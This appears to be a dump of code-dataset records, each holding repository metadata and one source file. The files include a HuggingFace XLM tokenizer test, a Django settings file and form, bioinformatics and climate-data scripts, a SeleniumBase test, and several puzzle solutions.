blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49e700cbe29de94dcbe30c3986931889084d727b | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/nlp/Bert_Chinese_ID3433_for_PyTorch/transformers/tests/xlm/test_tokenization_xlm.py | bd056b69d430916d4db4caa60fd158aa3492ff77 | [
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 3,292 | py | # coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.models.xlm.tokenization_xlm import VOCAB_FILES_NAMES, XLMTokenizer
from transformers.testing_utils import slow
from ..test_tokenization_common import TokenizerTesterMixin
class XLMTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
    """Tokenization tests for the XLM BPE tokenizer (Python implementation only)."""

    tokenizer_class = XLMTokenizer
    test_rust_tokenizer = False  # XLM ships no fast (Rust) tokenizer

    def setUp(self):
        super().setUp()

        # Tiny BPE vocabulary adapted from Sennrich et al. 2015 and
        # https://github.com/rsennrich/subword-nmt
        vocab = [
            "l", "o", "w", "e", "r", "s", "t", "i", "d", "n",
            "w</w>", "r</w>", "t</w>", "lo", "low", "er</w>",
            "low</w>", "lowest</w>", "newer</w>", "wider</w>", "<unk>",
        ]
        vocab_tokens = dict(zip(vocab, range(len(vocab))))
        merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]

        # Write the vocab/merges fixtures where the tokenizer expects them.
        self.vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["vocab_file"])
        self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
        with open(self.vocab_file, "w") as fp:
            fp.write(json.dumps(vocab_tokens))
        with open(self.merges_file, "w") as fp:
            fp.write("\n".join(merges))

    def get_input_output_texts(self, tokenizer):
        # A text pair that round-trips unchanged through the tokenizer.
        input_text = "lower newer"
        output_text = "lower newer"
        return input_text, output_text

    def test_full_tokenizer(self):
        """Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt"""
        tokenizer = XLMTokenizer(self.vocab_file, self.merges_file)

        tokens = tokenizer.tokenize("lower")
        self.assertListEqual(tokens, ["low", "er</w>"])

        input_tokens = tokens + ["<unk>"]
        self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), [14, 15, 20])

    @slow
    def test_sequence_builders(self):
        tokenizer = XLMTokenizer.from_pretrained("xlm-mlm-en-2048")

        text = tokenizer.encode("sequence builders", add_special_tokens=False)
        text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)

        encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
        encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)

        # <s> A </s> for a single sequence; <s> A </s> B </s> for a pair.
        assert encoded_sentence == [0] + text + [1]
        assert encoded_pair == [0] + text + [1] + text_2 + [1]
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
50e593e5345382e1c4b44ea0718549de7998cc89 | d3eec7a516ffca4620206f23d399fa085660fb3c | /demo/settings.py | 48a2c62a6757f3a8fb08ef27522fb303d0295091 | [] | no_license | anykate/extend_user_demo | 90c5bff2e973d22d0976e495d2ca4e686be86cf1 | bffce102cefffad30975032c378ce3efbbfb0b5d | refs/heads/master | 2020-11-28T09:52:20.453293 | 2019-12-23T15:21:19 | 2019-12-23T15:21:19 | 229,775,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,139 | py | """
Django settings for demo project.
Generated by 'django-admin startproject' using Django 3.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^wya3o)mghoj7fa$@c(3ra*y7n%ie+6#r0vu2db87h13ce)noi'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # My Apps
    'myapps.app.apps.AppConfig',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'demo.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'demo.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'Asia/Kolkata'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| [
"aryamane.aniket@gmail.com"
] | aryamane.aniket@gmail.com |
13f3dd0325d622f22a952ada5c8b888c11b78111 | d9a4cecfdcccdb60f55b5e3a5670d178f4cf2211 | /copyjunctions_simple.py | d6190e6d10a0be188019de1fac8a00b6d9bfe112 | [
"Apache-2.0"
] | permissive | geng-lee/BAM-to-Junction-BED | e75426f919bbe1781abe8dc6be2de3f83157585b | a878710ee395b2bf7f2eb7e4df84f8383d39d662 | refs/heads/master | 2023-03-17T01:08:20.040686 | 2017-02-28T20:39:23 | 2017-02-28T20:39:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,594 | py | ### hierarchical_clustering.py
#Copyright 2005-2012 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#################
### Imports an tab-delimited expression matrix and produces and hierarchically clustered heatmap
#################
# bugs, import matplotlib.colors as mc, -row_method
# new features fastcluster
import export
import string
import time
import sys, os
import shutil
import unique
import getopt
################# General data import methods #################
def filepath(filename):
    """Resolve *filename* to a full path using the project's unique module."""
    return unique.filepath(filename)
def cleanUpLine(line):
    """Return *line* with newlines, carriage returns, literal '\\c' sequences,
    and double-quote characters removed.

    Fix: the original called ``string.replace(...)``, a Python-2-only module
    function that no longer exists in Python 3; ``str.replace`` behaves
    identically on both versions.
    """
    data = line.replace('\n', '')
    # '\c' is not a recognized escape, so the original literal was really the
    # two characters backslash + 'c'; spell it explicitly to avoid the warning.
    data = data.replace('\\c', '')
    data = data.replace('\r', '')
    data = data.replace('"', '')
    return data
def getFolders(sub_dir):
    """Return directory entries containing no '.' (i.e. folder names only)."""
    entries = unique.read_directory(sub_dir)
    return [entry for entry in entries if '.' not in entry]
def getFiles(sub_dir):
    """Return directory entries containing a '.' (i.e. file names only)."""
    entries = unique.read_directory(sub_dir)
    return [entry for entry in entries if '.' in entry]
def copyJunctionFiles(directory):
    """Copy each sample folder's junctions.bed into <directory>/junctionBEDfiles/.

    Copies are renamed to '<sample_folder>__junctions.bed' so files from
    different samples do not collide.
    """
    # Guard: defined even if an exception fires before the first copy, so the
    # error message below can never raise NameError (the original could).
    source_file = None
    for top_level in getFolders(directory):
        try:
            files = getFiles(directory + '/' + top_level)
            for file in files:
                if 'junctions.bed' in file and 'junctionBEDfiles' not in top_level:
                    source_file = filepath(directory + '/' + top_level + '/' + file)
                    destination_file = filepath(directory + '/' + 'junctionBEDfiles/' + top_level + '__junctions.bed')
                    export.copyFile(source_file, destination_file)
                    # Single-string print works identically on Python 2 and 3.
                    print('copying to: ' + destination_file)
        except Exception:
            # Best-effort: report and continue with the next sample folder.
            print('failed to copy ' + str(source_file))
if __name__ == '__main__':
    # Require at least one command-line argument (the input directory).
    if len(sys.argv[1:]) <= 1:
        # Single-string prints work identically on Python 2 and 3
        # (the original used Python-2-only print statements).
        print("Warning! Please designate a BAM file as input in the command-line")
        print("Example: python BAMtoJunctionBED.py --i /Users/me/sample1.bam --g /Users/me/human.gtf")
        sys.exit()
    else:
        options, remainder = getopt.getopt(sys.argv[1:], '', ['i=', 'g=', 'r='])
        for opt, arg in options:
            if opt == '--i':
                directory = arg
        # Create the output folder up front; ignore "already exists" errors.
        try:
            os.mkdir(directory + '/junctionBEDfiles')
        except Exception:
            pass
        copyJunctionFiles(directory)
| [
"nsalomonis@gmail.com"
] | nsalomonis@gmail.com |
fca91a107b5e307a442b5bceeab6a80e12a5c2d9 | 6df76f8a6fcdf444c3863e3788a2f4b2c539c22c | /django code/p25/enroll/forms.py | 81abe59143f26d866e689893095a339e98c74dbb | [] | no_license | basantbhandari/DjangoProjectsAsDocs | 068e4a704fade4a97e6c40353edb0a4299bd9678 | 594dbb560391eaf94bb6db6dc07702d127010b88 | refs/heads/master | 2022-12-18T22:33:23.902228 | 2020-09-22T13:11:01 | 2020-09-22T13:11:01 | 297,651,728 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
class StudentRegistration(forms.Form):
    """Form collecting a student's name, e-mail address, and first name."""

    name = forms.CharField()
    email = forms.EmailField()
    first_name = forms.CharField()
| [
"36443209+basantbhandari@users.noreply.github.com"
] | 36443209+basantbhandari@users.noreply.github.com |
de9c252d46aa0d2b94e2e420716e08d4b131d555 | fc195da9608a52dc298f2fea74d38260425ba829 | /examples/translations/japanese_test_1.py | c45ba7a97b67466613e62ddb3d4f77b38e8dd496 | [
"MIT"
] | permissive | kawarada-san/SeleniumBase | 9f824992911d0eade63df6ab877ae9fd9d6f5b5e | 8e601717fdef0814aae01c6411ea0e1fb114a269 | refs/heads/master | 2021-04-08T21:26:08.663911 | 2020-03-20T04:37:28 | 2020-03-20T04:37:28 | 248,811,137 | 0 | 0 | MIT | 2020-03-20T17:11:45 | 2020-03-20T17:11:45 | null | UTF-8 | Python | false | false | 845 | py | # Japanese Language Test - Python 3 Only!
from seleniumbase.translate.japanese import セレンテストケース # noqa
class テストクラス(セレンテストケース):  # noqa
    def test_例1(self):
        # Open the Japanese Wikipedia main page and verify it loaded.
        self.URLを開く("https://ja.wikipedia.org/wiki/")
        self.テキストを確認する("ウィキペディア")
        self.要素を確認する('[title="メインページに移動する"]')
        # Search for "anime" and verify the article heading.
        self.テキストを更新("#searchInput", "アニメ")
        self.クリックして("#searchButton")
        self.テキストを確認する("アニメ", "#firstHeading")
        # Search for "sushi" and verify the heading and an article image.
        self.テキストを更新("#searchInput", "寿司")
        self.クリックして("#searchButton")
        self.テキストを確認する("寿司", "#firstHeading")
        self.要素を確認する('img[alt="握り寿司"]')
| [
"mdmintz@gmail.com"
] | mdmintz@gmail.com |
19ae610a39764ccc48ee3fdcc09812438be053ca | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/concat82/612-tideGauge.py | 1815baf705abdb18d06e84f33cb97d92e2e83887 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,482 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd

#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'

# cd to the home dir to get tide-gauge (TG) information
os.chdir(home)
tg_list = os.listdir()

# process a single tide gauge (index 612 only)
x = 612
y = 613

# loop through the selected tide gauges
for t in range(x, y):
    tg = tg_list[t]
    print(tg)

    # move into this tide gauge's folder
    os.chdir(os.path.join(home, tg))

    # predictor folders: keep only sea-level pressure and the two wind components
    where = os.getcwd()
    csv_path = {'slp': os.path.join(where, 'slp'),
                "wnd_u": os.path.join(where, 'wnd_u'),
                'wnd_v': os.path.join(where, 'wnd_v')}

    # loop through the predictors
    for pred in csv_path.keys():
        os.chdir(os.path.join(home, tg))
        os.chdir(pred)

        # concatenate the yearly csv files for this predictor
        count = 1
        for yr in os.listdir():
            print(pred, ' ', yr)
            if count == 1:
                dat = pd.read_csv(yr)
            else:
                dat_yr = pd.read_csv(yr)
                dat = pd.concat([dat, dat_yr], axis=0)
            count += 1
        print(dat.shape)

        # save the concatenated predictor under out_path/<tg>/
        os.chdir(out_path)
        try:
            os.makedirs(tg)
            os.chdir(tg)  # cd to it after creating it
        except FileExistsError:
            # directory already exists
            os.chdir(tg)

        pred_name = '.'.join([pred, 'csv'])
        dat.to_csv(pred_name)
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
f2ec83131298fd44f3966e637b944e3667885a12 | 3940b4a507789e1fbbaffeb200149aee215f655a | /lc/review_629.KInversePairsArray.py | 8a4cbd070efefb7b9865f42b2eb8fafcf752eaa7 | [] | no_license | akimi-yano/algorithm-practice | 15f52022ec79542d218c6f901a54396a62080445 | 1abc28919abb55b93d3879860ac9c1297d493d09 | refs/heads/master | 2023-06-11T13:17:56.971791 | 2023-06-10T05:17:56 | 2023-06-10T05:17:56 | 239,395,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | # 629. K Inverse Pairs Array
# Hard
# 1131
# 136
# Add to List
# Share
# For an integer array nums, an inverse pair is a pair of integers [i, j] where 0 <= i < j < nums.length and nums[i] > nums[j].
# Given two integers n and k, return the number of different arrays consisting of numbers from 1 to n such that there are exactly k inverse pairs. Since the answer can be huge, return it modulo 10^9 + 7.
# Example 1:
# Input: n = 3, k = 0
# Output: 1
# Explanation: Only the array [1,2,3] which consists of numbers from 1 to 3 has exactly 0 inverse pairs.
# Example 2:
# Input: n = 3, k = 1
# Output: 2
# Explanation: The array [1,3,2] and [2,1,3] have exactly 1 inverse pair.
# Constraints:
# 1 <= n <= 1000
# 0 <= k <= 1000
# This solution works:
class Solution:
    """LeetCode 629 - K Inverse Pairs Array, solved with dynamic programming."""

    # Modulus required by the problem statement.
    MOD = (10**9) + 7

    def kInversePairs(self, n: int, k: int) -> int:
        """Count permutations of 1..n having exactly k inverse pairs (mod 1e9+7)."""
        # dp[i][j] = number of permutations of 1..i with exactly j inverse pairs.
        dp = [[0] * (k + 1) for _ in range(n + 1)]

        # Zero inverse pairs -> exactly one arrangement (the sorted order).
        for i in range(n + 1):
            dp[i][0] = 1

        for i in range(1, n + 1):
            for j in range(1, k + 1):
                # Sliding-window form of:
                #   for m in range(min(i - 1, j) + 1): dp[i][j] += dp[i-1][j-m]
                # obtained by subtracting dp[i][j-1]'s window from dp[i][j]'s.
                dp[i][j] = dp[i][j - 1] + dp[i - 1][j] - (dp[i - 1][j - i] if j >= i else 0)
        return dp[-1][-1] % Solution.MOD
return dp[-1][-1] % Solution.MOD | [
"akimi.mimi.yano@gmail.com"
] | akimi.mimi.yano@gmail.com |
954aed68a50f07d377742c0dd09e93768493af8f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_018/ch118_2020_03_31_17_12_49_349131.py | 5b8e656f9a0736224a9852ea334e20ccbbe25997 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | import math
def reflexao_total_interna(n1, n2, teta2graus):
    """Return True when total internal reflection occurs.

    n1, n2: refractive indices of the destination and origin media.
    teta2graus: angle of incidence in medium 2, in degrees.
    """
    teta2rad = math.radians(teta2graus)
    # Snell's law: n1*sin(teta1) = n2*sin(teta2)  =>  sin(teta1) = n2*sin(teta2)/n1
    sin_teta1 = (n2 * math.sin(teta2rad)) / n1
    # BUG FIX: the original applied math.sin() to this value a second time;
    # since sin(x) <= 1 for every real x, its '> 1' test could never be True,
    # so the function always returned False. Total internal reflection occurs
    # exactly when no real refraction angle exists, i.e. sin(teta1) > 1.
    return sin_teta1 > 1
return False | [
"you@example.com"
] | you@example.com |
566f6d1dd1cf89383dcf07c36cdd66d48a63be8f | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_RelativeDifference/trend_PolyTrend/cycle_30/ar_12/test_artificial_32_RelativeDifference_PolyTrend_30_12_20.py | 3d4e035ecfec1b335fef8fbde0e7c83cbacb5489 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 279 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 30, transform = "RelativeDifference", sigma = 0.0, exog_count = 20, ar_order = 12); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
deb2f2b6d8483b552b2f4314ce7f5ba958462d3a | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_coadd.py | 269e76e3327b7a8949217536052e70c5b6397b16 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | from gPhoton.gMap import gMap
def main():
    """Build a 30 s-cadence NUV count movie plus a coadded count image for
    sdB star SDSS J171642.81+412622.3 using gPhoton's gMap."""
    # NOTE(review): cntfile lives under .../sdBs/... while cntcoaddfile uses
    # .../sdB/... - possibly intentional, but worth confirming.
    gMap(band="NUV", skypos=[259.178375,41.439528], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_SDSSJ_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_SDSSJ_171642.81+412622.3/sdB_SDSSJ_171642.81+412622.3_count_coadd.fits", overwrite=True, verbose=3)


if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
8971f4fa9b187ce6b2424fd1736169682efe90b2 | 26f6313772161851b3b28b32a4f8d255499b3974 | /Python/1012_NumbersWithRepeatedDigits.py | 4f0a1b3cd50e2f10a2e76bc5453f8c25bb8a6125 | [] | no_license | here0009/LeetCode | 693e634a3096d929e5c842c5c5b989fa388e0fcd | f96a2273c6831a8035e1adacfa452f73c599ae16 | refs/heads/master | 2023-06-30T19:07:23.645941 | 2021-07-31T03:38:51 | 2021-07-31T03:38:51 | 266,287,834 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | """
Given a positive integer N, return the number of positive integers less than or equal to N that have at least 1 repeated digit.
Example 1:
Input: 20
Output: 1
Explanation: The only positive number (<= 20) with at least 1 repeated digit is 11.
Example 2:
Input: 100
Output: 10
Explanation: The positive numbers (<= 100) with at least 1 repeated digit are 11, 22, 33, 44, 55, 66, 77, 88, 99, and 100.
Example 3:
Input: 1000
Output: 262
Note:
1 <= N <= 10^9
"""
class Solution:
    def numDupDigitsAtMostN(self, N: int) -> int:
        """Count positive integers <= N containing at least one repeated digit.

        Strategy: count integers below N+1 whose digits are all distinct, then
        subtract from N. Distinct-digit numbers fall into two groups: those
        with fewer digits than N+1, and those with the same digit count but a
        smaller value.
        """

        def pick(m, cnt):
            # Ordered choices of `cnt` items out of `m` (falling factorial).
            total = 1
            for step in range(cnt):
                total *= (m - step)
            return total

        digits = list(map(int, str(N + 1)))
        K = len(digits)
        distinct = 0

        # Group 1: numbers with fewer than K digits (leading digit 1-9).
        for length in range(1, K):
            distinct += 9 * pick(9, length - 1)

        # Group 2: K-digit numbers smaller than N+1.
        seen = set()
        for i, digit in enumerate(digits):
            start = 1 if i == 0 else 0  # the leading digit cannot be 0
            for smaller in range(start, digit):
                if smaller not in seen:
                    # i digits are fixed as prefix; K-i-1 positions remain free.
                    distinct += pick(9 - i, K - i - 1)
            if digit in seen:
                # The prefix already repeats a digit: no further candidates.
                break
            seen.add(digit)

        return N - distinct
# Ad-hoc check against the LeetCode examples above (expected output: 1, 10, 262).
S = Solution()
print(S.numDupDigitsAtMostN(20))
print(S.numDupDigitsAtMostN(100))
print(S.numDupDigitsAtMostN(1000)) | [
"here0009@163.com"
] | here0009@163.com |
2d7c27442952fe478807ed74d7c022de2f10b28c | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_208/111.py | fb1d05f6613af1be13458ff9e2ba26f08ea8805e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,654 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 22 11:51:27 2017
@author: pellowes
"""
import numpy as np
import sys
# Hard-coded Code Jam input path; the second assignment overrides the first.
fileIn = '/Users/pellowes/test.in'
fileIn = '/Users/pellowes/Downloads/C-small-attempt1.in'
#fileIn = '/Users/pellowes/Downloads/A-large(3).in'
# Output file: same basename as the input, with a .out extension.
fileOut = fileIn.split('.')[0]+'.out'
f = open(fileIn,'r')  # NOTE(review): opened at import time, closed at the bottom of the script
fo = open(fileOut,'w')
class Town:
    """A town on the route, together with the horse stationed there."""

    def __init__(self, num, distances, horseDistance, horseSpeed):
        self.num = num
        self.timesTo = {}  # cache of travel times (unused by the simple solver)
        self.horseDistance = horseDistance
        self.horseSpeed = horseSpeed
        self.distances = distances
def solveSimple(n, q, horses, grid, stops):
    """Minimum time to ride from town 0 to town n-1 along a line of towns.

    horses[i] = (max distance, speed) strings for the horse at town i;
    grid[i][j] holds pairwise distance strings (only i -> i+1 entries are used).
    q and stops are accepted for signature compatibility but unused here.
    Returns the best time as a string.
    """
    distanceToNext = []
    distanceToEndAgg = []
    horseDistances = []
    horseSpeeds = []
    for horse in horses:
        horseDistances.append(int(horse[0]))
        horseSpeeds.append(int(horse[1]))
    for i in range(0, len(grid) - 1):
        distLine = grid[i]
        distanceToNext.append(int(distLine[i + 1]))
        distanceToEndAgg.append(-1)

    # distanceToEndAgg[i] = total distance from town i to the final town.
    agg = 0
    for j in range(len(distanceToNext) - 1, -1, -1):
        agg += distanceToNext[j]
        distanceToEndAgg[j] = agg
    distanceToEndAgg.append(0)

    # bestTimeFrom[i] = best known time from town i to the destination.
    bestTimeFrom = []
    for i in range(0, n):
        bestTimeFrom.append(1e99)
    bestTimeFrom[-1] = 0

    # Relax backwards: try riding town j's horse directly to town i.
    for i in range(n - 1, -1, -1):
        for j in range(0, i):
            if horseDistances[j] >= (distanceToEndAgg[j] - distanceToEndAgg[i]):
                timeBetween = (distanceToEndAgg[j] - distanceToEndAgg[i]) / horseSpeeds[j]
                if bestTimeFrom[j] > bestTimeFrom[i] + timeBetween:
                    bestTimeFrom[j] = bestTimeFrom[i] + timeBetween

    if bestTimeFrom[0] > 1e98:
        # Debug dump: no route was found, which should not happen on valid input.
        print(horses)
        print(horseDistances)
        print(horseSpeeds)
        print(grid)
        print(distanceToEndAgg)
    return str(bestTimeFrom[0])
numcases = int(f.readline())
for casenum in range(1, numcases + 1):
    # Each case: a line "N Q", then N horse lines, N distance rows, Q queries.
    problem = f.readline().strip().split(' ')
    n = int(problem[0])
    q = int(problem[1])
    horses = []
    grid = []
    stops = []
    for row in range(0, n):
        horses.append(f.readline().strip().split(' '))
    for row in range(0, n):
        grid.append(f.readline().strip().split(' '))
    for row in range(0, q):
        stops.append(f.readline().strip())
    fo.write('Case #' + repr(casenum) + ': ' + solveSimple(n, q, horses, grid, stops) + '\n')
f.close()
fo.close() | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
9da04c099883870e8ad931318365f288003451d8 | 9ed4d46aedd4d4acadb48d610e940594b5b7b3fd | /project_euler/problem_046/sol1.py | 07dd9bbf84c8046f193eae040861fc196b7ae147 | [
"MIT",
"CC-BY-NC-4.0",
"CC-BY-NC-SA-4.0"
] | permissive | TheAlgorithms/Python | 7596a0e236ed12a61f9db19a7ea68309779cc85b | 421ace81edb0d9af3a173f4ca7e66cc900078c1d | refs/heads/master | 2023-09-01T17:32:20.190949 | 2023-08-29T13:18:10 | 2023-08-29T13:18:10 | 63,476,337 | 184,217 | 48,615 | MIT | 2023-09-14T02:05:29 | 2016-07-16T09:44:01 | Python | UTF-8 | Python | false | false | 2,808 | py | """
